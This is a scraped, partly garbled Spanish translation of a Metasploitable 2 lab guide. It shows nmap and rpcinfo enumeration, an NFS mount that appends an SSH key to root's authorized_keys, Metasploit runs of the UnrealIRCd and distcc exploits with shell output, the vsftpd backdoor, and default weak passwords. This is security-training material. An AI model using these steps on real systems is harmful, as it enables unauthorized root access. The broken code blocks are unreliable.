Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Guia de Explotabilidad de Metasploitable 2 PDF
Guia de Explotabilidad de Metasploitable 2 PDF
Metasploitable 2
La mquina virtual Metasploitable es una versin de Ubuntu Linux intencionalmente vulnerable
diseada para probar herramientas de seguridad y demostrar vulnerabilidades comunes. La
versin 2 de esta mquina virtual se encuentra disponible para la descargadesde Sourceforge.net y
contiene an muchas ms vulnerabilidades que la imgen original. Esta mquina virtual es
compatible con VMWare, VirtualBox, y otras plataformas de virtualizacin comunes. De manera
predeterminada, las interfaces de red de Metasploitable se encuentran atadas a los adaptadores
de red NAT y Host-only, y la imagen no debe exponerse a una red hostl. Este artculo describe
muchas de las fallas de seguridad en la imagen de Metasploitable 2. En la actualidad hace falta
documentacin sobre el servidor web y las fallas de aplicaciones web, as como las
vulnerabilidades que permiten a un usuario local escalar a privilegios de root.
Este documento se seguir ampliando con el tiempo a medida que muchos de los defectos menos
evidentes
en
esta
plataforma
se
vayan
encontrando.
Primeros Pasos
Despus de arrancar la mquina virtual, inicie sesin en la consola con el usuario msfadminy
contrasea msfadmin. Desde la shell, ejecute el comando ifconfig para identificar la direccin IP.
?
1
2
3
4
5
6
msfadmin@metasploitable:~$ ifconfig
eth0
Servicios
Desde nuestro sistema de ataque (Linux, preferiblemente algo como Backtrack), identificaremos los
servicios de red abiertos en esta mquina virtual utilizando el Scanner de Seguridad Nmap. La
siguiente lnea de comando analizar todos los puertos TCP en la instancia de Metasploitable 2:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Casi todos estos servicios en escucha proporcionan un punto de entrada remoto en el sistema. En
la siguiente seccin, caminaremos a travs de algunos de estos vectores.
1
2
3
4
Esto se pone tan bueno como se v. El prximo servicio que debe tener en cuenta es el sistema de
archivos de red (NFS). NFS puede ser identificado sondeando el puerto 2049 directamente o
pidiendo a portmapper obtener una lista de servicios. El siguiente ejemplo usando rpcinfo para
identificar NFS y showmount -e para determinar que el recurso compartido "/" (la raz del sistema
de archivos) estar siendo exportado. Necesitaremos los paquetes de Ubuntu rpcbind y nfscommon para seguir adelante.
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@ubuntu:~# rpcinfo
program vers proto
100000
2
tcp
100000
2
udp
100024
1
udp
100024
1
tcp
100003
2
udp
100003
3
udp
100003
4
udp
100021
1
udp
100021
3
udp
100021
4
udp
100003
2
tcp
100003
3
tcp
100003
4
tcp
100021
1
tcp
100021
3
tcp
100021
4
tcp
100005
1
udp
100005
1
tcp
100005
2
udp
100005
2
tcp
100005
3
udp
100005
3
tcp
-p 192.168.99.131
port service
111 portmapper
111 portmapper
53318 status
43729 status
2049 nfs
2049 nfs
2049 nfs
46696 nlockmgr
46696 nlockmgr
46696 nlockmgr
2049 nfs
2049 nfs
2049 nfs
55852 nlockmgr
55852 nlockmgr
55852 nlockmgr
34887 mountd
39292 mountd
34887 mountd
39292 mountd
34887 mountd
39292 mountd
Obtener acceso a un sistema con un sistema de archivos modificable como este es algo trivial.
Para que sea as (y porque SSH est ejecutndose), generaremos una nueva llave SSH en
NFS
agregamos
nuestra
llave
al
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@ubuntu:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >>
/tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t
root@ubuntu:~# ssh root@192.168.99.131
Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
2008 i686
root@metasploitable:~#
Servicios: Backdoors
En el puerto 21, Metasploitable 2 ejecuta vsftpd, un servidor FTP popular. Esta versin en
particular contiene una puerta trasera (backdoor) que fue introducida en el cdigo fuente por un
intruso desconocido. El backdoor fue rpidamente identificado y eliminado, pero no antes de que
unas cuantas personas ya lo hubieran descargado. Si un nombre de usuario es enviado
terminando con la secuencia " :) " (carita felz), la versin con el backdoor abrir una shell en
escucha en el puerto 6200. Podemos demostrar esto con telnet o utilizando un mdulo
de Metasploit Framework para explotarlo automticamente:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
En el puerto 6667, Metasploitable 2 corre el demonio IRC UnreaIRCD. Esta versin contiene un
backdoor que pas desapercibido por meses, - disparado al enviar las letras "AB" seguidas de un
comando del sistema al servidor en cualquier puerto en escucha. Metasploit tiene un mdulo para
explotar esto con el fin de obtener una shell interactiva, como se muestra a continuacin.
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.99.131:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using y
instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8bMUYsfmGvOLHBxe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8bMUYsfmGvOLHBxe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at
21:53:59 -0700
id
uid=0(root) gid=0(root)
Mucho menos sutl es el viejo backdoor remanente "ingreslock" que escucha en el puerto 1524. El
puerto ingreslock era una opcin popular hace una dcada para agregar una puerta trasera a un
servidor comprometido. Accederlo es fcil:
?
1
2
3
4
5
6
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msfconsole
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.99.131
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uk3UdiwLUq0LX3Bi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uk3UdiwLUq0LX3Bi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at
22:06:03 -0700
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Samba, cuando se configura con un recurso de archivos compartidos y enlaces extensos (wide
links) habilitados (los cuales vienen activados por defecto), puede utilizarse tambien como un tipo
de puerta trasera para acceder archivos que no estaban destinados a ser compartidos. El siguiente
ejemplo utiliza un mdulo de Metasploit para proporcionar acceso al sistema de archivos raz
utilizando una conexin annima y un recurso compartido con acceso de escritura.
?
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Contraseas Dbiles
Adicionalmente a las ms flagrantes puertas traseras y errores de configuracin, Metasploitable 2
tiene terrible seguridad de contrasea tanto para la cuenta del sistema como para la cuenta del
servidor de base de datos. El usuario principal de administracinmsfadmin tiene una contrasea
que coincide con el nombre de usuario. Al descubrir la lista de los usuarios en este sistema, ya sea
mediante el uso de otro defecto para capturar el archivo passwd, o mediante la enumeracin de
estos identificadores de usuario a travs de Samba, un ataque de fuerza bruta puede ser utilizado
para acceder rpidamente a varias cuentas de usuario. Como mnimo, las siguientes cuentas
dbiles del sistema estn configuradas en el sistema.
msfadmin
user
user
postgres
postgres
sys
batman
klog
123456789
service
service
Adicional a estas cuentas a nivel de sistema, el servicio de PostgreSQL puede ser accedido con el
nombre de usuario postgres y contrasea postgres, mientras que el servicio de MySQL est
abierto con el nombre de usuario root y con una contrasea en blanco. El servicio
de VNC proporciona el acceso de escritorio remoto a travs de la contrasea password.